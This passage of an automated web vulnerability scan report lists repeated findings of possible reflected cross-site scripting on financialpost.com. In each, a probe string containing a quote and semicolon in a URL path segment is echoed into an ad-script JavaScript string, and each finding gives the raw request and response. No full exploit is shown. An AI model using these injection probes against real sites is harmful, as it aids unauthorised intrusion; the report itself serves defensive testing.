This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists3a104'%3b5a547f5c299/Retired+forgotten/3996666/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83730
Expires: Sun, 19 Dec 2010 03:14:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists3a104';5a547f5c299/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists3a104';5a547f5c299;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14547920?">
...[SNIP]...

1.218. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Retired+forgotten/3996666/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60e8'%3bc423016c9ce was submitted in the REST URL parameter 4. This input was echoed as b60e8';c423016c9ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Retired+forgotten/3996666b60e8'%3bc423016c9ce/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63851
Expires: Sun, 19 Dec 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/retired-forgotten/3996666b60e8';c423016c9ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=retired-forgotten;kw=3996666b60e8';c423016c9ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...

1.219. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Retired+forgotten/3996666/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85984'%3b9b5aa3d4cb2 was submitted in the REST URL parameter 5. This input was echoed as 85984';9b5aa3d4cb2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/Retired+forgotten/3996666/85984'%3b9b5aa3d4cb2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37190


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/retired%20forgotten/3996666/85984';9b5aa3d4cb2/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=retired%20forgotten;kw=3996666;kw=85984';9b5aa3d4cb2;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...

1.220. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/barry-critchley.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9914'%3b305cc1577f was submitted in the REST URL parameter 1. This input was echoed as a9914';305cc1577f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opiniona9914'%3b305cc1577f/columnists/barry-critchley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44289


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opiniona9914';305cc1577f/columnists/barry-critchley;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opiniona9914';305cc1577f;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37283901?">
...[SNIP]...

1.221. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/barry-critchley.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eacd7'%3bd88cefa4959 was submitted in the REST URL parameter 2. This input was echoed as eacd7';d88cefa4959 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistseacd7'%3bd88cefa4959/barry-critchley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37612


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistseacd7';d88cefa4959/barry-critchley;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistseacd7';d88cefa4959;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=90543144?">
...[SNIP]...

1.222. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/barry-critchley.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29f40'%3b40381cfea5e was submitted in the REST URL parameter 3. This input was echoed as 29f40';40381cfea5e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/29f40'%3b40381cfea5e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43401


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/29f40';40381cfea5e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=29f40';40381cfea5e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=62189455?">
...[SNIP]...

1.223. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/diane-francis.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4697c'%3b898f841844e was submitted in the REST URL parameter 1. This input was echoed as 4697c';898f841844e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion4697c'%3b898f841844e/columnists/diane-francis.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43472


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion4697c';898f841844e/columnists/diane-francis;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion4697c';898f841844e;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=81599666?">
...[SNIP]...

1.224. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/diane-francis.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d524b'%3be3824be34be was submitted in the REST URL parameter 2. This input was echoed as d524b';e3824be34be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistsd524b'%3be3824be34be/diane-francis.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43436


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsd524b';e3824be34be/diane-francis;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsd524b';e3824be34be;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=72279401?">
...[SNIP]...

1.225. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/diane-francis.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c15cd'%3b24a7cbbec0f was submitted in the REST URL parameter 3. This input was echoed as c15cd';24a7cbbec0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/c15cd'%3b24a7cbbec0f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44221


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/c15cd';24a7cbbec0f/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=c15cd';24a7cbbec0f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32681172?">
...[SNIP]...

1.226. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/garry-marr.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 204b9'%3bda5ddd2e310 was submitted in the REST URL parameter 1. This input was echoed as 204b9';da5ddd2e310 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion204b9'%3bda5ddd2e310/columnists/garry-marr.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43441


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion204b9';da5ddd2e310/columnists/garry-marr;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion204b9';da5ddd2e310;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14041721?">
...[SNIP]...

1.227. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/garry-marr.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6548'%3b3159e915d61 was submitted in the REST URL parameter 2. This input was echoed as f6548';3159e915d61 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnistsf6548'%3b3159e915d61/garry-marr.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37562


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsf6548';3159e915d61/garry-marr;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsf6548';3159e915d61;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=12876194?">
...[SNIP]...

1.228. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/garry-marr.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc04b'%3bdce0ac574b1 was submitted in the REST URL parameter 3. This input was echoed as cc04b';dce0ac574b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists/cc04b'%3bdce0ac574b1 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43402


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/cc04b';dce0ac574b1/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=cc04b';dce0ac574b1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=73935194?">
...[SNIP]...

1.229. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jamie-golombek.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88d2f'%3b0c9133db820 was submitted in the REST URL parameter 1. This input was echoed as 88d2f';0c9133db820 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion88d2f'%3b0c9133db820/columnists/jamie-golombek.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37637


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion88d2f';0c9133db820/columnists/jamie-golombek;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion88d2f';0c9133db820;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=31471561?">
...[SNIP]...

1.230. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/jamie-golombek.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed13'%3b43d2ce6bccf was submitted in the REST URL parameter 2. This input was echoed as 4ed13';43d2ce6bccf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists4ed13'%3b43d2ce6bccf/jamie-golombek.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
